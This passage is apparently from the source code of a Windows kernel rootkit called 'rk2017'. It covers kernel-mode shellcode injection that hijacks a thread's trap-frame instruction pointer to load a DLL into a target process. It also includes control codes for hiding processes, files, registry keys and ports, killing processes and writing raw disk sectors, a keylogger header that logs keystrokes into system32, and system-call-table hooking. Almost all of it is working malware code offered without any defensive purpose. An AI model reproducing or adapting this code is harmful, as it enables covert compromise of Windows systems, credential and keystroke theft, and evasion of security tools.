return STATUS_UNSUCCESSFUL; 54 | } 55 | pKtrapFrame = *(PINJECT_X86_KTRAP_FRAME *)((ULONG_PTR)pInjectObjInfo->pInjectThread + \ 56 | g_InjectRelevantOffset.ulOffsetTrapFrame); 57 | if (MmIsAddressValid(pKtrapFrame) == FALSE) 58 | { 59 | if (g_InjectAplList.StdCallKeResumeThread) 60 | { 61 | g_InjectAplList.StdCallKeResumeThread(pInjectObjInfo->pInjectThread,NULL); 62 | } 63 | return STATUS_ADDRESS_NOT_ASSOCIATED; 64 | } 65 | do 66 | { 67 | pCharShellCode = ExAllocatePoolWithTag(NonPagedPool,ulSize,'PasP'); 68 | } while (NULL == pCharShellCode); 69 | RtlZeroMemory(pCharShellCode,ulSize); 70 | RtlCopyMemory(pCharShellCode,pShellCode,ulSize); 71 | if (g_InjectAplList.ulx86LoadLibrary) 72 | { 73 | RtlCopyMemory((PCHAR)((ULONG)pCharShellCode + 2),&g_InjectAplList.ulx86LoadLibrary,sizeof(ULONG)); 74 | } 75 | for(uli = (ULONG)pCharShellCode;uli <= (ULONG)pCharShellCode + ulSize;uli++) 76 | { 77 | if (*(ULONG*)uli == INJECT_KTRAP_FRAME_EIP_TAG) 78 | { 79 | *(ULONG*)uli = pKtrapFrame->Eip; 80 | break; 81 | } 82 | } 83 | //InitializeObjectAttributes(&ObjectAttributes,0,0,0,0); 84 | //pClientId = (PCLIENT_ID)((ULONG_PTR)pInjectObjInfo->pInjectThread + g_InjectRelevantOffset.ulOffsetCid); 85 | //if (MmIsAddressValid(pClientId) == FALSE) 86 | //{ 87 | // if (g_InjectAplList.StdCallKeResumeThread) 88 | // { 89 | // g_InjectAplList.StdCallKeResumeThread(pInjectObjInfo->pInjectThread,NULL); 90 | // } 91 | // if (pCharShellCode) 92 | // { 93 | // ExFreePoolWithTag(pCharShellCode,'PasP'); 94 | // } 95 | // return STATUS_ADDRESS_NOT_ASSOCIATED; 96 | //} 97 | Status = ObOpenObjectByPointer(pInjectObjInfo->pInjectProcess, \ 98 | OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE, \ 99 | NULL, \ 100 | PROCESS_ALL_ACCESS, \ 101 | *PsProcessType, \ 102 | KernelMode, \ 103 | &hInjectProcess); 104 | //Status = ZwOpenProcess(&hInjectProcess,PROCESS_ALL_ACCESS,&ObjectAttributes,pClientId); 105 | if (NT_ERROR(Status)) 106 | { 107 | if (pCharShellCode) 108 | { 109 | ExFreePoolWithTag(pCharShellCode,'PasP'); 110 | } 111 | if (g_InjectAplList.StdCallKeResumeThread) 112 | { 113 | g_InjectAplList.StdCallKeResumeThread(pInjectObjInfo->pInjectThread,NULL); 114 | } 115 | return Status; 116 | } 117 | if (NT_SUCCESS(Status)) 118 | { 119 | ulRetSize = ulSize; 120 | KeStackAttachProcess(pInjectObjInfo->pInjectProcess,&ApcState); 121 | Status = ZwAllocateVirtualMemory(hInjectProcess,&pBaseAddress,0,&ulRetSize, \ 122 | /*MEM_RESERVE | MEM_COMMIT*/MEM_COMMIT,PAGE_EXECUTE_READWRITE); 123 | if (NT_ERROR(Status)) 124 | { 125 | if (pCharShellCode) 126 | { 127 | ExFreePoolWithTag(pCharShellCode,'PasP'); 128 | } 129 | if (hInjectProcess) 130 | { 131 | ZwClose(hInjectProcess); 132 | } 133 | if (g_InjectAplList.StdCallKeResumeThread) 134 | { 135 | g_InjectAplList.StdCallKeResumeThread(pInjectObjInfo->pInjectThread,NULL); 136 | } 137 | return Status; 138 | } 139 | RtlZeroMemory(pBaseAddress,ulRetSize); 140 | RtlCopyMemory(pBaseAddress,pCharShellCode,ulSize); 141 | for(uli = (ULONG)pBaseAddress;uli <= (ULONG)pBaseAddress + ulSize;uli++) 142 | { 143 | if (*(ULONG*)uli == INJECT_KTRAP_FRAME_PATH_TAG) 144 | { 145 | pTmpPath = (PVOID)uli; 146 | RtlZeroMemory(pTmpPath,100); 147 | RtlCopyMemory(pTmpPath,pInjectObjInfo->InjectDllPath,strlen(pInjectObjInfo->InjectDllPath)); 148 | break; 149 | } 150 | } 151 | for(uli = (ULONG)pBaseAddress;uli <= (ULONG)pBaseAddress + ulSize;uli++) 152 | { 153 | if (*(ULONG*)uli == INJECT_KTRAP_FRAME_PARAMETERS) 154 | { 155 | RtlCopyMemory((PCHAR)uli,&pTmpPath,sizeof(ULONG)); 156 | break; 157 | } 158 | } 159 | //Status = g_InjectAplList.StdCallNtProtectVirtualMemory(hInjectProcess, \ 160 | // &pBaseAddress, \ 161 | // ulRetSize, \ 162 | // PAGE_EXECUTE_READ, \ 163 | // &ulOldProtect); 164 | //if (NT_SUCCESS(Status)) 165 | //{ 166 | //} 167 | KeUnstackDetachProcess(&ApcState); 168 | if (MmIsAddressValid((PVOID)pKtrapFrame->Eip)) 169 | { 170 | pKtrapFrame->Eip = (ULONG)pBaseAddress; 171 | } 172 | } 173 | if (hInjectProcess) 174 | { 175 | ZwClose(hInjectProcess); 176 | } 177 | if (g_InjectAplList.StdCallKeResumeThread) 178 | { 179 | g_InjectAplList.StdCallKeResumeThread(pInjectObjInfo->pInjectThread,NULL); 180 | } 181 | if (pCharShellCode) 182 | { 183 | ExFreePoolWithTag(pCharShellCode,'PasP'); 184 | } 185 | return STATUS_SUCCESS; 186 | } 187 | NTSTATUS x64ShellCodeInject(PINJECT_OBJECT_INFORMATION pInjectObjInfo,PCHAR pShellCode,ULONG_PTR ulSize) 188 | { 189 | NTSTATUS Status; 190 | //PINJECT_X64_KTRAP_FRAME pKtrapFrame; 191 | 192 | Status = STATUS_SUCCESS; 193 | 194 | return Status; 195 | } 196 | NTSTATUS InjectShellCode(PINJECT_OBJECT_INFORMATION pInjectObjInfo) 197 | { 198 | NTSTATUS Status; 199 | 200 | if (NULL == pInjectObjInfo) 201 | { 202 | return STATUS_INVALID_PARAMETER_1; 203 | } 204 | if (NULL == pInjectObjInfo->pInjectProcess && \ 205 | NULL == pInjectObjInfo->pInjectThread) 206 | { 207 | return STATUS_INVALID_PARAMETER_1; 208 | } 209 | Status = IsWindows64Bits(pInjectObjInfo->pInjectProcess); 210 | if (Status == 0x86) 211 | { 212 | Status = x86ShellCodeInject(pInjectObjInfo, \ 213 | (PCHAR)x86ShellCode, \ 214 | (ULONG)x86ShellCodeEnd - (ULONG)x86ShellCode); 215 | if (NT_SUCCESS(Status)) 216 | { 217 | return Status; 218 | } 219 | if (NT_ERROR(Status)) 220 | { 221 | return Status; 222 | } 223 | } 224 | else if (Status == 0x64) 225 | { 226 | Status = x64ShellCodeInject(pInjectObjInfo, \ 227 | (PCHAR)x64ShellCode, \ 228 | (ULONG_PTR)x64ShellCodeEnd - (ULONG_PTR)x64ShellCode); 229 | if (NT_SUCCESS(Status)) 230 | { 231 | return Status; 232 | } 233 | if (NT_ERROR(Status)) 234 | { 235 | return Status; 236 | } 237 | } 238 | else if (NT_ERROR(Status)) 239 | { 240 | } 241 | else 242 | { 243 | } 244 | return Status; 245 | } 246 | NTSTATUS InjectKtrapFrame(PINJECT_PROCESS_INFORMATION pInjectProcessInfo,PCHAR pDllPath) 247 | { 248 | NTSTATUS Status; 249 | PINJECT_OBJECT_INFORMATION pInjectObjInfo; 250 | 251 | //DbgBreakPoint(); 252 | pInjectObjInfo = NULL; 253 | Status = STATUS_SUCCESS; 254 | 255 | if (NULL == pInjectProcessInfo && \ 256 | NULL == pDllPath) 257 | { 258 | return STATUS_INVALID_PARAMETER_1 | STATUS_INVALID_PARAMETER_2; 259 | } 260 | if (InitializeInjectInformation(&g_InjectRelevantOffset) == FALSE) 261 | { 262 | return STATUS_UNSUCCESSFUL; 263 | } 264 | pInjectObjInfo = FindInjectThread(pInjectProcessInfo); 265 | if (NULL == pInjectObjInfo) 266 | { 267 | if (pInjectObjInfo) 268 | { 269 | ExFreePoolWithTag(pInjectObjInfo,'PasP'); 270 | } 271 | return STATUS_THREAD_NOT_IN_PROCESS; 272 | } 273 | if (InitializeInjectDllPath(pInjectObjInfo,pDllPath) == FALSE) 274 | { 275 | if (pInjectObjInfo) 276 | { 277 | ExFreePoolWithTag(pInjectObjInfo,'PasP'); 278 | } 279 | return STATUS_UNSUCCESSFUL; 280 | } 281 | if (g_InjectAplList.bInitialize == FALSE) 282 | { 283 | if (InitializeInjectApiList(pInjectObjInfo,&g_InjectAplList) == FALSE) 284 | { 285 | if (pInjectObjInfo) 286 | { 287 | ExFreePoolWithTag(pInjectObjInfo,'PasP'); 288 | } 289 | return STATUS_UNSUCCESSFUL; 290 | } 291 | } 292 | Status = InjectShellCode(pInjectObjInfo); 293 | if (NT_SUCCESS(Status)) 294 | { 295 | } 296 | if (pInjectObjInfo) 297 | { 298 | ExFreePoolWithTag(pInjectObjInfo,'PasP'); 299 | } 300 | return Status; 301 | } 302 | PINJECT_OBJECT_INFORMATION FindInjectThread(PINJECT_PROCESS_INFORMATION pInjectProcessInfo) 303 | { 304 | PVOID pCurProc; 305 | PVOID pCurThread; 306 | PVOID pTeb; 307 | PVOID pActivationContextStackPointer; 308 | UCHAR SuspendCount; 309 | ULONG_PTR ulCrossThreadFlags; 310 | PINJECT_OBJECT_INFORMATION pInjectObjectInfo; 311 | NTSTATUS Status; 312 | KAPC_STATE ApcState; 313 | 314 | #ifdef __x86_64__ 315 | PLIST_ENTRY64 pCurListEntry,pCurThreadList; 316 | PLIST_ENTRY64 pListHead,pThreadHead; 317 | #else 318 | PLIST_ENTRY pCurListEntry,pCurThreadList; 319 | PLIST_ENTRY pListHead,pThreadHead; 320 | #endif 321 | 322 | Status = STATUS_UNSUCCESSFUL; 323 | pTeb = NULL; 324 | pActivationContextStackPointer = NULL; 325 | 326 | do 327 | { 328 | pInjectObjectInfo = ExAllocatePoolWithTag(NonPagedPool,sizeof(INJECT_OBJECT_INFORMATION),'PasP'); 329 | } while (NULL == pInjectObjectInfo); 330 | RtlZeroMemory(pInjectObjectInfo,sizeof(INJECT_OBJECT_INFORMATION)); 331 | if (pInjectProcessInfo->ulPid > 4) 332 | { 333 | Status = PsLookupProcessByProcessId((HANDLE)pInjectProcessInfo->ulPid,(PEPROCESS*)&pCurProc); 334 | } 335 | else 336 | { 337 | if (NULL == pInjectProcessInfo) 338 | { 339 | if (pInjectProcessInfo) 340 | { 341 | ExFreePoolWithTag(pInjectObjectInfo,'PasP'); 342 | } 343 | return NULL; 344 | } 345 | pCurProc = IoGetCurrentProcess(); 346 | #ifdef __x86_64__ 347 | pListHead = pCurListEntry = (PLIST_ENTRY64)((ULONG_PTR)pCurProc + g_InjectRelevantOffset.ulOffsetFlink); 348 | #else 349 | pListHead = pCurListEntry = (PLIST_ENTRY)((ULONG_PTR)pCurProc + g_InjectRelevantOffset.ulOffsetFlink); 350 | #endif 351 | do 352 | { 353 | pCurProc = (PVOID)((ULONG_PTR)pCurListEntry - g_InjectRelevantOffset.ulOffsetFlink); 354 | if (_strnicmp((char *)((ULONG_PTR)pCurProc + g_InjectRelevantOffset.ulOffsetName), \ 355 | pInjectProcessInfo->pInjectProcessName, \ 356 | strlen(pInjectProcessInfo->pInjectProcessName)) == 0) 357 | { 358 | break; 359 | } 360 | #ifdef __x86_64__ 361 | pCurListEntry = (PLIST_ENTRY64)pCurListEntry->Flink; 362 | #else 363 | pCurListEntry = pCurListEntry->Flink; 364 | #endif 365 | } while (pCurListEntry != pListHead); 366 | } 367 | pThreadHead = (PVOID)((ULONG_PTR)pCurProc + g_InjectRelevantOffset.ulOffsetThreadListHead); 368 | #ifdef __x86_64__ 369 | pCurThreadList = (PLIST_ENTRY64)pThreadHead->Flink; 370 | #else 371 | pCurThreadList = pThreadHead->Flink; 372 | #endif 373 | KeStackAttachProcess(pCurProc,&ApcState); 374 | while (pThreadHead != pCurThreadList) 375 | { 376 | pCurThread = (PVOID)((ULONG_PTR)pCurThreadList - g_InjectRelevantOffset.ulOffsetThreadListEntry); 377 | SuspendCount = *(UCHAR*)((ULONG_PTR)pCurThread + g_InjectRelevantOffset.ulOffsetSuspendCount); 378 | ulCrossThreadFlags = ((ULONG_PTR)pCurThread + g_InjectRelevantOffset.ulOffsetCrossThreadFlags); 379 | pTeb = (PVOID)*(ULONG_PTR *)((ULONG_PTR)pCurThread + g_InjectRelevantOffset.ulOffsetTeb); 380 | if (NULL == pTeb) 381 | { 382 | #ifdef __x86_64__ 383 | pCurThreadList = (PLIST_ENTRY64)pCurThreadList->Flink; 384 | #else 385 | pCurThreadList = pCurThreadList->Flink; 386 | #endif 387 | continue; 388 | } 389 | if (!SuspendCount && \ 390 | (ulCrossThreadFlags & PS_CROSS_THREAD_FLAGS_SYSTEM) == 0) 391 | { 392 | if (g_InjectRelevantOffset.WindowsVersion.bIsWindowsXp && \ 393 | FALSE == g_InjectRelevantOffset.WindowsVersion.bIs64Bit) 394 | { 395 | pInjectObjectInfo->pInjectProcess = pCurProc; 396 | pInjectObjectInfo->pInjectThread = pCurThread; 397 | if (NT_SUCCESS(Status)) 398 | { 399 | ObDereferenceObject(pCurProc); 400 | } 401 | KeUnstackDetachProcess(&ApcState); 402 | return pInjectObjectInfo; 403 | } 404 | else 405 | { 406 | pActivationContextStackPointer = (PVOID)*(ULONG_PTR *)((ULONG_PTR)pTeb + \ 407 | g_InjectRelevantOffset.ulOffsetActivationContextStackPointer); 408 | if (pActivationContextStackPointer) 409 | { 410 | pInjectObjectInfo->pInjectProcess = pCurProc; 411 | pInjectObjectInfo->pInjectThread = pCurThread; 412 | if (NT_SUCCESS(Status)) 413 | { 414 | ObDereferenceObject(pCurProc); 415 | } 416 | KeUnstackDetachProcess(&ApcState); 417 | return pInjectObjectInfo; 418 | } 419 | } 420 | } 421 | #ifdef __x86_64__ 422 | pCurThreadList = (PLIST_ENTRY64)pCurThreadList->Flink; 423 | #else 424 | pCurThreadList = pCurThreadList->Flink; 425 | #endif 426 | } 427 | KeUnstackDetachProcess(&ApcState); 428 | if (NT_SUCCESS(Status)) 429 | { 430 | ObDereferenceObject(pCurProc); 431 | } 432 | if (pInjectObjectInfo) 433 | { 434 | ExFreePoolWithTag(pInjectObjectInfo,'PasP'); 435 | } 436 | return NULL; 437 | } -------------------------------------------------------------------------------- /rk/InjectKtrapFrame.h: -------------------------------------------------------------------------------- 1 | #ifndef JECT_KTRAP_FRAME_H__ 2 | #define JECT_KTRAP_FRAME_H__ 3 | 4 | #define WINDOWS_VERSION_NONE 0 5 | #define WINDOWS_VERSION_2K 1 6 | #define WINDOWS_VERSION_XP 2 7 | #define WINDOWS_VERSION_2K3 3 8 | #define WINDOWS_VERSION_2K3_SP1 4 9 | #define WINDOWS_VERSION_VISTA 5 10 | #define WINDOWS_VERSION_WIN7 6 11 | 12 | typedef struct _INJECT_X64_KTRAP_FRAME 13 | { 14 | ULONG64 P1Home; 15 | ULONG64 P2Home; 16 | ULONG64 P3Home; 17 | ULONG64 P4Home; 18 | ULONG64 P5; 19 | KPROCESSOR_MODE PreviousMode; 20 | KIRQL PreviousIrql; 21 | UCHAR FaultIndicator; 22 | UCHAR ExceptionActive; 23 | ULONG MxCsr; 24 | ULONG64 Rax; 25 | ULONG64 Rcx; 26 | ULONG64 Rdx; 27 | ULONG64 R8; 28 | ULONG64 R9; 29 | ULONG64 R10; 30 | ULONG64 R11; 31 | union 32 | { 33 | ULONG64 GsBase; 34 | ULONG64 GsSwap; 35 | }; 36 | M128A Xmm0; 37 | M128A Xmm1; 38 | M128A Xmm2; 39 | M128A Xmm3; 40 | M128A Xmm4; 41 | M128A Xmm5; 42 | union 43 | { 44 | ULONG64 FaultAddress; 45 | ULONG64 ContextRecord; 46 | ULONG64 TimeStampCKCL; 47 | }; 48 | ULONG64 Dr0; 49 | ULONG64 Dr1; 50 | ULONG64 Dr2; 51 | ULONG64 Dr3; 52 | ULONG64 Dr6; 53 | ULONG64 Dr7; 54 | 55 | union 56 | { 57 | struct 58 | { 59 | ULONG64 DebugControl; 60 | ULONG64 LastBranchToRip; 61 | ULONG64 LastBranchFromRip; 62 | ULONG64 LastExceptionToRip; 63 | ULONG64 LastExceptionFromRip; 64 | }; 65 | struct 66 | { 67 | ULONG64 LastBranchControl; 68 | ULONG LastBranchMSR; 69 | }; 70 | }; 71 | USHORT SegDs; 72 | USHORT SegEs; 73 | USHORT SegFs; 74 | USHORT SegGs; 75 | ULONG64 TrapFrame; 76 | ULONG64 Rbx; 77 | ULONG64 Rdi; 78 | ULONG64 Rsi; 79 | ULONG64 Rbp; 80 | union 81 | { 82 | ULONG64 ErrorCode; 83 | ULONG64 ExceptionFrame; 84 | ULONG64 TimeStampKlog; 85 | }; 86 | ULONG64 Rip; 87 | USHORT SegCs; 88 | UCHAR Fill0; 89 | UCHAR Logging; 90 | USHORT Fill1[2]; 91 | ULONG EFlags; 92 | ULONG Fill2; 93 | ULONG64 Rsp; 94 | USHORT SegSs; 95 | USHORT Fill3; 96 | LONG CodePatchCycle; 97 | } INJECT_X64_KTRAP_FRAME,*PINJECT_X64_KTRAP_FRAME; 98 | 99 | typedef struct _INJECT_X86_KTRAP_FRAME 100 | { 101 | ULONG DbgEbp; 102 | ULONG DbgEip; 103 | ULONG DbgArgMark; 104 | ULONG DbgArgPointer; 105 | ULONG TempSegCs; 106 | ULONG TempEsp; 107 | ULONG Dr0; 108 | ULONG Dr1; 109 | ULONG Dr2; 110 | ULONG Dr3; 111 | ULONG Dr6; 112 | ULONG Dr7; 113 | ULONG SegGs; 114 | ULONG SegEs; 115 | ULONG SegDs; 116 | ULONG Edx; 117 | ULONG Ecx; 118 | ULONG Eax; 119 | ULONG PreviousPreviousMode; 120 | ULONG ExceptionList; 121 | ULONG SegFs; 122 | ULONG Edi; 123 | ULONG Esi; 124 | ULONG Ebx; 125 | ULONG Ebp; 126 | ULONG ErrCode; 127 | ULONG Eip; 128 | ULONG SegCs; 129 | ULONG EFlags; 130 | ULONG HardwareEsp; 131 | ULONG HardwareSegSs; 132 | ULONG V86Es; 133 | ULONG V86Ds; 134 | ULONG V86Fs; 135 | ULONG V86Gs; 136 | }INJECT_X86_KTRAP_FRAME,*PINJECT_X86_KTRAP_FRAME; 137 | 138 | typedef struct _LDR_DATA_TABLE_ENTRY 139 | { 140 | LIST_ENTRY InLoadOrderLinks; 141 | LIST_ENTRY InMemoryOrderLinks; 142 | LIST_ENTRY InInitializationOrderLinks; 143 | PVOID DllBase; 144 | PVOID EntryPoint; 145 | ULONG SizeOfImage; 146 | UNICODE_STRING FullDllName; 147 | UNICODE_STRING BaseDllName; 148 | ULONG Flags; 149 | unsigned short LoadCount; 150 | unsigned short TlsIndex; 151 | union 152 | { 153 | LIST_ENTRY HashLinks; 154 | struct 155 | { 156 | PVOID SectionPointer; 157 | ULONG CheckSum; 158 | }; 159 | }; 160 | union 161 | { 162 | ULONG TimeDateStamp; 163 | PVOID LoadedImports; 164 | }; 165 | PVOID EntryPointActivationContext; 166 | PVOID PatchInformation; 167 | LIST_ENTRY ForwarderLinks; 168 | LIST_ENTRY ServiceTagLinks; 169 | LIST_ENTRY StaticLinks; 170 | }LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY; 171 | 172 | typedef struct _INJECT_OBJECT_INFORMATION 173 | { 174 | PVOID pInjectProcess; 175 | PVOID pInjectThread; 176 | CHAR InjectDllPath[100]; 177 | }INJECT_OBJECT_INFORMATION,*PINJECT_OBJECT_INFORMATION; 178 | 179 | typedef NTSTATUS (__fastcall *FASTCALL_NTSUSPENDTHREAD)(IN HANDLE ThreadHandle,OUT PULONG PreviousSuspendCount OPTIONAL); 180 | typedef NTSTATUS (__stdcall *STDCALL_NTSUSPENDTHREAD)(IN HANDLE ThreadHandle,OUT PULONG PreviousSuspendCount OPTIONAL); 181 | typedef NTSTATUS (__stdcall *STDCALL_NTPROTECTVIRTUALMEMORY)(HANDLE ProcessHandle, \ 182 | PVOID *BaseAddress , \ 183 | PSIZE_T RegionSize, \ 184 | ULONG NewProtect, \ 185 | PULONG OldProtect); 186 | 187 | typedef struct _INJECT_API_LIST 188 | { 189 | FASTCALL_NTSUSPENDTHREAD FastCallKeSuspendThread; 190 | FASTCALL_NTSUSPENDTHREAD FastCallKeResumeThread; 191 | 192 | STDCALL_NTSUSPENDTHREAD StdCallKeSuspendThread; 193 | STDCALL_NTSUSPENDTHREAD StdCallKeResumeThread; 194 | 195 | STDCALL_NTPROTECTVIRTUALMEMORY StdCallNtProtectVirtualMemory; 196 | 197 | ULONG_PTR ulx86LoadLibrary; 198 | ULONG64 ulx64LoadLibrary; 199 | 200 | BOOLEAN bInitialize; 201 | }INJECT_API_LIST,*PINJECT_API_LIST; 202 | 203 | typedef struct _INJECT_PROCESS_INFORMATION 204 | { 205 | ULONG_PTR ulPid; 206 | CHAR pInjectProcessName[1]; 207 | }INJECT_PROCESS_INFORMATION,*PINJECT_PROCESS_INFORMATION; 208 | 209 | 210 | extern INJECT_API_LIST g_InjectAplList; 211 | extern BOOLEAN g_bIsInjectKtrapFrame; 212 | 213 | #endif 214 | 215 | #define INJECT_KTRAP_FRAME_EIP_TAG 0x40404040 216 | #define INJECT_KTRAP_FRAME_PATH_TAG 0x80808080 217 | #define INJECT_KTRAP_FRAME_PARAMETERS 0x88888888 218 | 219 | PINJECT_OBJECT_INFORMATION FindInjectThread(PINJECT_PROCESS_INFORMATION pInjectProcessInfo); 220 | NTSTATUS InjectKtrapFrame(PINJECT_PROCESS_INFORMATION pInjectProcessInfo,PCHAR pDllPath); 221 | NTSTATUS x86ShellCodeInject(PINJECT_OBJECT_INFORMATION pInjectObjInfo,PCHAR pShellCode,ULONG ulSize); -------------------------------------------------------------------------------- /rk/InjectShellCode.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/DeviceObject/rk2017/8f0cfa5845446d864bd9e1ee06041ed5b29f7948/rk/InjectShellCode.h -------------------------------------------------------------------------------- /rk/IoCtlCode.h: -------------------------------------------------------------------------------- 1 | #ifndef __IO_CTL_CODE_H__ 2 | #define __IO_CTL_CODE_H__ 3 | 4 | #define RK2017_BASENAME L"RK2017Drv" 5 | #define RK2017_DEVNAME L"\\Device\\" RK2017_BASENAME 6 | #define RK2017_LINKNAME L"\\DosDevices\\" RK2017_BASENAME 7 | #define RK2017_USERLINK L"\\\\.\\" RK2017_BASENAME 8 | 9 | //#define IOCTL(n) CTL_CODE(FILE_DEVICE_UNKNOWN,n,METHOD_BUFFERED,0) 10 | 11 | #define IOCTL(n) CTL_CODE(FILE_DEVICE_UNKNOWN,n,METHOD_BUFFERED,0) 12 | 13 | #define IOC(ops) IOCTL_ ## ops 14 | #define IOP(ops) struct ops ## _params 15 | #define IOR(ops) struct ops ## _returns 16 | #define IOS(ops) struct ops ## _shared 17 | 18 | #pragma pack(1) 19 | 20 | IOP(RkHideProcess) 21 | { 22 | BOOLEAN bIsAddHide; 23 | ULONG ulProcessId; 24 | CHAR ProcessName[300]; 25 | }; 26 | enum 27 | { 28 | IOC(RkHideProcess) = IOCTL('Rkhp') 29 | }; 30 | 31 | 32 | IOP(RkHideFile) 33 | { 34 | BOOLEAN bIsAddHide; 35 | WCHAR FileNameW[300]; 36 | }; 37 | enum 38 | { 39 | IOC(RkHideFile) = IOCTL('Rkhf') 40 | }; 41 | 42 | IOP(RkHideRegister) 43 | { 44 | BOOLEAN bIsAddHide; 45 | WCHAR RegisterPath[512]; 46 | }; 47 | enum 48 | { 49 | IOC(RkHideRegister) = IOCTL('Rkhr') 50 | }; 51 | 52 | IOP(RkHidePort) 53 | { 54 | BOOLEAN bIsAddHide; 55 | ULONG ulPort; 56 | }; 57 | enum 58 | { 59 | IOC(RkHidePort) = IOCTL('Rkht') 60 | }; 61 | 62 | IOP(RkKillProcess) 63 | { 64 | HANDLE hKillPId; 65 | CHAR ProcessName[MAX_PATH]; 66 | }; 67 | enum 68 | { 69 | IOC(RkKillProcess) = IOCTL('Rkkp') 70 | }; 71 | 72 | #define SECTOR_SIZE (4 * 1024) 73 | enum 74 | { 75 | IOC(ReadSector) = IOCTL('Rsec') 76 | }; 77 | 78 | IOP(ReadSector) 79 | { 80 | ULONG ulDiskIndex; 81 | ULONG ulStartSector; 82 | ULONG ulSectorSize; 83 | ULONG ulLength; 84 | CHAR OrgSector[SECTOR_SIZE]; 85 | char NewSector[SECTOR_SIZE]; 86 | }; 87 | enum 88 | { 89 | IOC(WriteSector) = IOCTL('Wsec') 90 | }; 91 | 92 | IOP(WriteSector) 93 | { 94 | ULONG ulDiskIndex; 95 | ULONG ulStartSector; 96 | ULONG ulSectorSize; 97 | ULONG ulLength; 98 | CHAR OrgSector[SECTOR_SIZE]; 99 | char NewSector[SECTOR_SIZE]; 100 | }; 101 | enum 102 | { 103 | IOC(InjectKtrapFrame) = IOCTL('IjkF') 104 | }; 105 | 106 | IOP(InjectKtrapFrame) 107 | { 108 | ULONG ulPid; 109 | CHAR pInjectProcessName[MAX_PATH]; 110 | CHAR pInjectDllPath[MAX_PATH]; 111 | }; 112 | #pragma pack() 113 | 114 | #endif 115 | -------------------------------------------------------------------------------- /rk/KLog.h: -------------------------------------------------------------------------------- 1 | #ifndef __KLOG_H__ 2 | #define __KLOG_H__ 3 | 4 | #define KEYBOARD_RECORD_FILE L"\\??\\c:\\windows\\system32\\Klog.Dat" 5 | 6 | 7 | typedef struct _KEY_STATE 8 | { 9 | BOOLEAN bIsAlt; 10 | BOOLEAN bIsCtrl; 11 | BOOLEAN bIsShift; 12 | BOOLEAN bIsCapsLock; 13 | BOOLEAN bIsWindows; 14 | } KEY_STATE,*PKEY_STATE; 15 | 16 | typedef struct _KEY_INFO 17 | { 18 | LIST_ENTRY NextKeyInfo; 19 | USHORT uMakeCode; 20 | USHORT uKeyFlags; 21 | PCHAR pShowKeyDat; 22 | } KEY_INFO,*PKEY_INFO; 23 | 24 | typedef struct _KEY_DATA 25 | { 26 | LIST_ENTRY ListEntry; 27 | USHORT KeyData; 28 | USHORT KeyFlags; 29 | BOOLEAN bIsAlt; 30 | BOOLEAN bIsCtrl; 31 | BOOLEAN bIsShift; 32 | BOOLEAN bIsCapsLock; 33 | 34 | } KEY_DATA,*PKEY_DATA; 35 | 36 | extern KEY_STATE g_KeyState; 37 | extern LIST_ENTRY g_ListKbdRecord; 38 | extern KSPIN_LOCK g_KbdRecordSpinLock; 39 | extern HANDLE g_hKbdRecord; 40 | extern HANDLE g_hWorkRecord; 41 | extern BOOLEAN g_bExitThread; 42 | 43 | NTSTATUS HookKbdClass(BOOLEAN bHook); 44 | BOOLEAN GetKeyFromMakeCode(PKEY_INFO pKeyInfo,PKEY_STATE pKeyState); 45 | NTSTATUS WriteKbdRecord(PKEY_INFO pKeyInfo); 46 | 47 | #endif -------------------------------------------------------------------------------- /rk/Rk2017Hook.c: -------------------------------------------------------------------------------- 1 | #include "rk.h" 2 | #include "DefSystemVar.h" 3 | #include "DefSSDT.h" 4 | 5 | PVOID *pNewSystemCallTable; 6 | PMDL pMyMDL; 7 | 8 | 9 | NTSTATUS Hook() 10 | { 11 | ULONG ulIndex; 12 | 13 | pMyMDL = NULL; 14 | pNewSystemCallTable = NULL; 15 | ulIndex = 0; 16 | 17 | pMyMDL = MmCreateMdl(NULL, \ 18 | KeServiceDescriptorTable->Ntoskrnl.ServiceTableBase, \ 19 | KeServiceDescriptorTable->Ntoskrnl.ulNumberOfServices * 4); 20 | if(NULL == pMyMDL) 21 | { 22 | return STATUS_UNSUCCESSFUL; 23 | } 24 | MmBuildMdlForNonPagedPool(pMyMDL); 25 | pMyMDL->MdlFlags = pMyMDL->MdlFlags | MDL_MAPPED_TO_SYSTEM_VA; 26 | pNewSystemCallTable = MmMapLockedPages(pMyMDL,KernelMode); 27 | if(NULL == pNewSystemCallTable) 28 | { 29 | return STATUS_UNSUCCESSFUL; 30 | } 31 | ulIndex = *(PULONG)((ULONG)ZwDeviceIoControlFile + 1); 32 | //g_OldZwDeviceIoControlFile = (PVOID)*(PULONG)((ULONG)pNewSystemCallTable + ulIndex * 4); 33 | //g_OldZwDeviceIoControlFile = (ZWDEVICECONTROLIOFILE)*(PULONG)((ULONG)pNewSystemCallTable + ulIndex * 4); 34 | //InterlockedExchange((PULONG)((ULONG)pNewSystemCallTable + ulIndex * 4),(LONG)NewZwDeviceIoControlFile); 35 | 36 | //ulIndex = *(PULONG)((ULONG)ZwQueryDirectoryFile + 1); 37 | //g_OrgialZwQueryDirectoryFile = (PVOID)*(PULONG)((ULONG)pNewSystemCallTable + ulIndex * 4); 38 | //g_OrgialZwQueryDirectoryFile = (ZWQUERYDIRECTORYFILE)*(PULONG)((ULONG)pNewSystemCallTable + ulIndex * 4); 39 | //InterlockedExchange((PULONG)((ULONG)pNewSystemCallTable + ulIndex * 4),(LONG)NewZwQueryDirectoryFile); 40 | //HOOK_SYSCALL(ulHookFnc,ulHookedFnc,pSaveFnc); 41 | 42 | return STATUS_SUCCESS; 43 | } 44 | NTSTATUS UnHook() 45 | { 46 | ULONG ulIndex; 47 | if(pNewSystemCallTable) 48 | { 49 | //ulIndex = *(PULONG)((ULONG)ZwQueryDirectoryFile + 1); 50 | //InterlockedExchange((PULONG)((ULONG)pNewSystemCallTable + ulIndex * 4),(LONG)g_OrgialZwQueryDirectoryFile); 51 | 52 | ulIndex = *(PULONG)((ULONG)ZwDeviceIoControlFile + 1); 53 | //InterlockedExchange((PULONG)((ULONG)pNewSystemCallTable + ulIndex * 4),(LONG)g_OldZwDeviceIoControlFile); 54 | //UNHOOK_SYSCALL(ulHookFnc,pSaveFnc,ulHookedFnc); 55 | MmUnmapLockedPages(pNewSystemCallTable,pMyMDL); 56 | IoFreeMdl(pMyMDL); 57 | } 58 | return STATUS_SUCCESS; 59 | } -------------------------------------------------------------------------------- /rk/Rk2017Hook.h: -------------------------------------------------------------------------------- 1 | #ifndef __RK2017_HOOK_H__ 2 | 